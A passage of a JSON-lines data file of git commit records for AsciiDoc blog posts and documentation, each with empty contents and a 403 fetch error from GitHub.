arch,wayeast\/elasticsearch,infusionsoft\/elasticsearch,petabytedata\/elasticsearch,Widen\/elasticsearch,hydro2k\/elasticsearch,qwerty4030\/elasticsearch,kalburgimanjunath\/elasticsearch,petabytedata\/elasticsearch,strapdata\/elassandra-test,beiske\/elasticsearch,infusionsoft\/elasticsearch,yongminxia\/elasticsearch,tsohil\/elasticsearch,mohit\/elasticsearch,kalburgimanjunath\/elasticsearch,MjAbuz\/elasticsearch,HonzaKral\/elasticsearch,yongminxia\/elasticsearch,yynil\/elasticsearch,jbertouch\/elasticsearch,PhaedrusTheGreek\/elasticsearch,Brijeshrpatel9\/elasticsearch,fekaputra\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,Helen-Zhao\/elasticsearch,pozhidaevak\/elasticsearch,KimTaehee\/elasticsearch,iacdingping\/elasticsearch,rhoml\/elasticsearch,achow\/elasticsearch,LewayneNaidoo\/elasticsearch,martinstuga\/elasticsearch,mikemccand\/elasticsearch,martinstuga\/elasticsearch,onegambler\/elasticsearch,nellicus\/elasticsearch,drewr\/elasticsearch,jango2015\/elasticsearch,MichaelLiZhou\/elasticsearch,onegambler\/elasticsearch,rhoml\/elasticsearch,xuzha\/elasticsearch,kubum\/elasticsearch,glefloch\/elasticsearch,18098924759\/elasticsearch,obourgain\/elasticsearch,artnowo\/elasticsearch,palecur\/elasticsearch,dataduke\/elasticsearch,nomoa\/elasticsearch,masaruh\/elasticsearch,fekaputra\/elasticsearch,tahaemin\/elasticsearch,Collaborne\/elasticsearch,MichaelLiZhou\/elasticsearch,kubum\/elasticsearch,C-Bish\/elasticsearch,hirdesh2008\/elasticsearch,nomoa\/elasticsearch,rmuir\/elasticsearch,franklanganke\/elasticsearch,petabytedata\/elasticsearch,tahaemin\/elasticsearch,PhaedrusTheGreek\/elasticsearch,truemped\/elasticsearch,tkssharma\/elasticsearch,jeteve\/elasticsearch,martinstuga\/elasticsearch,mm0\/elasticsearch,markwalkom\/elasticsearch,dpursehouse\/elasticsearch,pablocastro\/elasticsearch,naveenhooda2000\/elasticsearch,mbrukman\/elasticsearch,GlenRSmith\/elasticsearch,iacdingping\/elasticsearch,jprante\/elasticsearch,fforbeck\/elasticsearch,jimhooker2002\/elasticsearch,iacdingping\/elasticsearch,wayeast\/elasticsearch,yynil\/elasticsearch,Liziyao\/elasticsearch,nellicus\/elasticsearch,andrestc\/elasticsearch,camilojd\/elasticsearch,Collaborne\/elasticsearch,mjason3\/elasticsearch,polyfractal\/elasticsearch,F0lha\/elasticsearch,mapr\/elasticsearch,episerver\/elasticsearch,amit-shar\/elasticsearch,areek\/elasticsearch,btiernay\/elasticsearch,rhoml\/elasticsearch,yongminxia\/elasticsearch,cwurm\/elasticsearch,weipinghe\/elasticsearch,pritishppai\/elasticsearch,wbowling\/elasticsearch,diendt\/elasticsearch,gingerwizard\/elasticsearch,nellicus\/elasticsearch,alexshadow007\/elasticsearch,ZTE-PaaS\/elasticsearch,adrianbk\/elasticsearch,kingaj\/elasticsearch,ZTE-PaaS\/elasticsearch,robin13\/elasticsearch,kalimatas\/elasticsearch,pranavraman\/elasticsearch,nilabhsagar\/elasticsearch,linglaiyao1314\/elasticsearch,andrejserafim\/elasticsearch,Helen-Zhao\/elasticsearch,vietlq\/elasticsearch,vingupta3\/elasticsearch,mcku\/elasticsearch,nezirus\/elasticsearch,linglaiyao1314\/elasticsearch,iantruslove\/elasticsearch,kubum\/elasticsearch,kalburgimanjunath\/elasticsearch,wimvds\/elasticsearch,Chhunlong\/elasticsearch,clintongormley\/elasticsearch,lchennup\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JackyMai\/elasticsearch,jeteve\/elasticsearch,wimvds\/elasticsearch,i-am-Nathan\/elasticsearch,s1monw\/elasticsearch,lchennup\/elasticsearch,lks21c\/elasticsearch,fred84\/elasticsearch,wimvds\/elasticsearch,kalimatas\/elasticsearch,apepper\/elasticsearch,beiske\/elasticsearch,beiske\/elasticsearch,nrkkalyan\/elasticsearch,strapdata\/elassandra-test,amit-shar\/elasticsearch,dylan8902\/elasticsearch,nrkkalyan\/elasticsearch,hafkensite\/elasticsearch,lmtwga\/elasticsearch,rhoml\/elasticsearch,lks21c\/elasticsearch,lmtwga\/elasticsearch,andrejserafim\/elasticsearch,karthikjaps\/elasticsearch,MisterAndersen\/elasticsearch,mikemccand\/elasticsearch,vroyer\/elassandra","old_file":"docs\/reference\/modules\/snapshots.asciidoc","new_file":"docs\/reference\/modules\/snapshots.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2b97079bc5640af26029e8b8fc46581c84d35b09","subject":"Publish 2015-2-10-2014.adoc","message":"Publish 2015-2-10-2014.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"2015-2-10-2014.adoc","new_file":"2015-2-10-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c28b4e7a3760f7069a3880ab71e4a6680ad1cf8","subject":"Stub for documentation for the e2e tests bot","message":"Stub for documentation for the e2e tests bot\n","repos":"tisnik\/fabric8-analytics-common,tisnik\/fabric8-analytics-common,tisnik\/fabric8-analytics-common","old_file":"e2e_tests_bot\/README.adoc","new_file":"e2e_tests_bot\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tisnik\/fabric8-analytics-common.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"451a32714d5db6090303d00b6d8d3eecd44ef660","subject":"Update 2015-10-03-Install-VirtualBox-Guest-Additions-Command-Line.adoc","message":"Update 2015-10-03-Install-VirtualBox-Guest-Additions-Command-Line.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-03-Install-VirtualBox-Guest-Additions-Command-Line.adoc","new_file":"_posts\/2015-10-03-Install-VirtualBox-Guest-Additions-Command-Line.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dea78baafa38ba0448c667d0ce891aaf2b559c19","subject":"Update 2016-01-26-Software-architecture-like-a-building-own-house.adoc","message":"Update 2016-01-26-Software-architecture-like-a-building-own-house.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-01-26-Software-architecture-like-a-building-own-house.adoc","new_file":"_posts\/2016-01-26-Software-architecture-like-a-building-own-house.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc543bc6b9f10044e0fc734a54ab9614e0fd7a00","subject":"Update 2016-07-29-Stable-Matching-Algorithm.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a6285d0cdc71791a6ba59e7e28ae8bcbc0a05de","subject":"Update 2016-09-26-Drupal-Meetup-Tokyo-Vol-3.adoc","message":"Update 2016-09-26-Drupal-Meetup-Tokyo-Vol-3.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2016-09-26-Drupal-Meetup-Tokyo-Vol-3.adoc","new_file":"_posts\/2016-09-26-Drupal-Meetup-Tokyo-Vol-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cfe9a190543a34753f43dd2e0c6a340c34667699","subject":"y2b create post High Tech Golf Clubs!","message":"y2b create post High Tech Golf Clubs!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-10-15-High-Tech-Golf-Clubs.adoc","new_file":"_posts\/2014-10-15-High-Tech-Golf-Clubs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"106cfd833067e66a119ded1f04f1561dc64717f3","subject":"y2b create post What Is This Madness?","message":"y2b create post What Is This Madness?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-09-What-Is-This-Madness.adoc","new_file":"_posts\/2017-05-09-What-Is-This-Madness.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c106ca22f1afc0fe83717ceb4b3623232b7857c6","subject":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","message":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c5292326ac021fe5925622169eff9cb0af91616","subject":"Create How-to-get-your-addon-listed.asciidoc","message":"Create How-to-get-your-addon-listed.asciidoc","repos":"forge\/docs,agoncal\/docs,addonis1990\/docs,addonis1990\/docs,agoncal\/docs,forge\/docs,luiz158\/docs,luiz158\/docs","old_file":"tutorials\/How-to-get-your-addon-listed.asciidoc","new_file":"tutorials\/How-to-get-your-addon-listed.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d3700b24285995327c5e480a2d86f4bca54d66ad","subject":"Update 2016-02-19-Java-Memory-Pic-and-Flags.adoc","message":"Update 2016-02-19-Java-Memory-Pic-and-Flags.adoc","repos":"azubkov\/azubkov.github.io,azubkov\/azubkov.github.io,azubkov\/azubkov.github.io","old_file":"_posts\/2016-02-19-Java-Memory-Pic-and-Flags.adoc","new_file":"_posts\/2016-02-19-Java-Memory-Pic-and-Flags.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/azubkov\/azubkov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85f5ded5e82d096f0ef7179ad557afdd02dc11b6","subject":"Update 2016-01-13-how-to-install-python-on-linux.adoc","message":"Update 2016-01-13-how-to-install-python-on-linux.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-13-how-to-install-python-on-linux.adoc","new_file":"_posts\/2016-01-13-how-to-install-python-on-linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9eab2d9c89dc1c65a8817b5ee17b63e82e19a60","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/people_i_am_afraid_of.adoc","new_file":"content\/writings\/people_i_am_afraid_of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c6a3157fd8391c9ba5428df1fbd3bfeb010ef1bc","subject":"Adds information on RibbonRoutingFilter HTTP Clients","message":"Adds information on RibbonRoutingFilter HTTP Clients\n","repos":"brenuart\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,sfat\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,sfat\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,sfat\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,sfat\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,sfat\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,brenuart\/spring-cloud-netflix","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sfat\/spring-cloud-netflix.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6d482f47f994e98ea0e507422ed056e3a107d902","subject":"Update 2016-02-26-Just-testings-how-it-works.adoc","message":"Update 2016-02-26-Just-testings-how-it-works.adoc","repos":"Roen00\/roen00.github.io,Roen00\/roen00.github.io,Roen00\/roen00.github.io,Roen00\/roen00.github.io","old_file":"_posts\/2016-02-26-Just-testings-how-it-works.adoc","new_file":"_posts\/2016-02-26-Just-testings-how-it-works.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Roen00\/roen00.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49e2639385ec3cc643609a6cddd3128bb93df259","subject":"Update 2017-05-08-Static-Translations-Bundle.adoc","message":"Update 2017-05-08-Static-Translations-Bundle.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-08-Static-Translations-Bundle.adoc","new_file":"_posts\/2017-05-08-Static-Translations-Bundle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9891b1269538ecb1755cecd4d3711e9606a678d","subject":"Update 2016-04-01-Ill-find-you.adoc","message":"Update 2016-04-01-Ill-find-you.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abf8f38a8231fecd309a4f93ce19699424b9513b","subject":"y2b create post $1000 Titanium iPhone Case","message":"y2b create post $1000 Titanium iPhone Case","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-15-1000-Titanium-iPhone-Case.adoc","new_file":"_posts\/2016-01-15-1000-Titanium-iPhone-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1f1814343683d67ffb1f4ba302fb2a2266cacb6","subject":"Update 2016-10-21-1-Treffen-am-23-September.adoc","message":"Update 2016-10-21-1-Treffen-am-23-September.adoc","repos":"creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io","old_file":"_posts\/2016-10-21-1-Treffen-am-23-September.adoc","new_file":"_posts\/2016-10-21-1-Treffen-am-23-September.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/creative-coding-bonn\/creative-coding-bonn.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7412fdad101d1c5a768a7461305ccbdfbba3da4c","subject":"y2b create post iPad 5 \\\/ iPad Mini 2 to feature fingerprint sensor?","message":"y2b create post iPad 5 \\\/ iPad Mini 2 to feature fingerprint sensor?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-10-02-iPad-5--iPad-Mini-2-to-feature-fingerprint-sensor.adoc","new_file":"_posts\/2013-10-02-iPad-5--iPad-Mini-2-to-feature-fingerprint-sensor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e70032f8b3cbf3796f29e573af78695f213e0770","subject":"Doc : Add doc about authentication, optimistic locking and paging","message":"Doc : Add doc about authentication, optimistic locking and paging\n","repos":"alv-ch\/jobroom-api,alv-ch\/jobroom-api","old_file":"src\/docs\/asciidoc\/doc.adoc","new_file":"src\/docs\/asciidoc\/doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alv-ch\/jobroom-api.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24cbe6fbf78dad5463f7b866eb44a15c13614c4c","subject":"Update 2017-06-01-Open-Street-Map-Knowledge.adoc","message":"Update 2017-06-01-Open-Street-Map-Knowledge.adoc","repos":"porolakka\/hubpress.io,porolakka\/hubpress.io,porolakka\/hubpress.io,porolakka\/hubpress.io","old_file":"_posts\/2017-06-01-Open-Street-Map-Knowledge.adoc","new_file":"_posts\/2017-06-01-Open-Street-Map-Knowledge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/porolakka\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e38286868c7b7f6f948cda4d4beb13796f3c7909","subject":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","message":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a1bb96c3e34685570d193b55e4ee05ec37b0950","subject":"Update 2016-07-24-OSX-cache-clean.adoc","message":"Update 2016-07-24-OSX-cache-clean.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ca035a8a1eca382dea630b8b0712b7d09a665e0","subject":"Update 2019-01-31-Your-Blog-title.adoc","message":"Update 2019-01-31-Your-Blog-title.adoc","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22a618f2b637e1d57b1f0b3046b71fc57b3f5e04","subject":"Update 2016-08-03-2016-08-02.adoc","message":"Update 2016-08-03-2016-08-02.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-03-2016-08-02.adoc","new_file":"_posts\/2016-08-03-2016-08-02.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0fa7fcde1e004710006b8f5250abc0d27e9ac15","subject":"Update 2017-09-21-Dispositiv.adoc","message":"Update 2017-09-21-Dispositiv.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-09-21-Dispositiv.adoc","new_file":"_posts\/2017-09-21-Dispositiv.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8eca37521aad464c2082eb4514a10461215128e8","subject":"Accept CIP2016-01-26-mandatory-match","message":"Accept CIP2016-01-26-mandatory-match\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/1.accepted\/CIP2016-01-26-mandatory-match.adoc","new_file":"cip\/1.accepted\/CIP2016-01-26-mandatory-match.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8626e0e37a4c36cae475193131afb565c3932c41","subject":"y2b create post Don't Buy A New TV Without Watching This...","message":"y2b create post Don't Buy A New TV Without Watching This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-14-Dont-Buy-A-New-TV-Without-Watching-This.adoc","new_file":"_posts\/2017-06-14-Dont-Buy-A-New-TV-Without-Watching-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7084e0c53ae42916d0e9d72bc7ccd7be7925a59","subject":"Update 2019-02-22-I-T50.adoc","message":"Update 2019-02-22-I-T50.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-22-I-T50.adoc","new_file":"_posts\/2019-02-22-I-T50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"119a4c8a6cdd8d29e75fb4cab091efa58d057591","subject":"Update 2016-07-16-Quicksort-en-Scala.adoc","message":"Update 2016-07-16-Quicksort-en-Scala.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2016-07-16-Quicksort-en-Scala.adoc","new_file":"_posts\/2016-07-16-Quicksort-en-Scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"852cde03dfb17126dbc5462e56a24fafb3481186","subject":"Update 2018-05-07-try-gas-with-slack.adoc","message":"Update 2018-05-07-try-gas-with-slack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-07-try-gas-with-slack.adoc","new_file":"_posts\/2018-05-07-try-gas-with-slack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbffadd07ccd198fd579f206036bcc899c4f4d42","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5b4029e17c5c367f984f91ad67ef3606bfc2f38","subject":"Update MacOS_X_Challenge-Response.adoc","message":"Update MacOS_X_Challenge-Response.adoc","repos":"madrat-\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam","old_file":"doc\/MacOS_X_Challenge-Response.adoc","new_file":"doc\/MacOS_X_Challenge-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"38208deb01ccbfc81b4aa68347c33115317b4e70","subject":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50974d0a895db37e38285cac4ffbc80b433f720f","subject":"create post The Coolest Laptop You've Never Heard Of...","message":"create post The Coolest Laptop You've Never Heard Of...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-The-Coolest-Laptop-Youve-Never-Heard-Of....adoc","new_file":"_posts\/2018-02-26-The-Coolest-Laptop-Youve-Never-Heard-Of....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b90c68f0f2b6a7f1aaee997353587d3ec69239ca","subject":"Update 2018-02-27-Switch-from-class-to-Python-36-Named-Tuple.adoc","message":"Update 